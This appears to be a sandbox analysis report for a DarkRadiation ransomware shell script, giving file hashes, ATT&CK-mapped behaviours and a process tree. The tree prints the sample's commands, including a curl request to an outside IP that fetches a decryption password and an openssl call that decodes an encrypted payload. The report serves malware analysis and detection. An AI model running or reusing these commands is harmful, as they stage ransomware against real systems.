Analysis

  • max time kernel
    149s
  • max time network
    71s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh

  • Size

    17KB

  • MD5

    35dbc971ba859fb80c291d811154b112

  • SHA1

    1168e6f49632123d6df8c0f91291512ed82f6b1e

  • SHA256

    719e0120cf1e5c0dd80e8e88d9c0c621f8b6f0fd03f7c10758eb453006aecf1f

  • SHA512

    a82d86d8c74ad034f1530c83cfe13c13f1f5bae63f31fcc26d08b632da1a02e4eb64ac7ba609a119d25d6c129ef98741417b1accb482c641ade09602810e2277

  • SSDEEP

    384:wydspDw5wi6xc696x04vo0Os6T4vo0OltRK:wEspEmLxRMx0vhTvbA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information (1 TTP, 1 IoC)

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information (7 IoCs)

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory (9 IoCs)

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools (1 TTP, 2 IoCs)

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh"
    1⤵
    • Writes file to tmp directory
    PID:738
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Reads runtime system information
      PID:740
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:825
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:826
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:827
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:828
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:829
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:830
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:831

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/sh-thd.CEF1HN

    Filesize

    1B

    MD5

    68b329da9893e34099c7d8ad5cb9c940

    SHA1

    adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

    SHA256

    01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

    SHA512

    be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09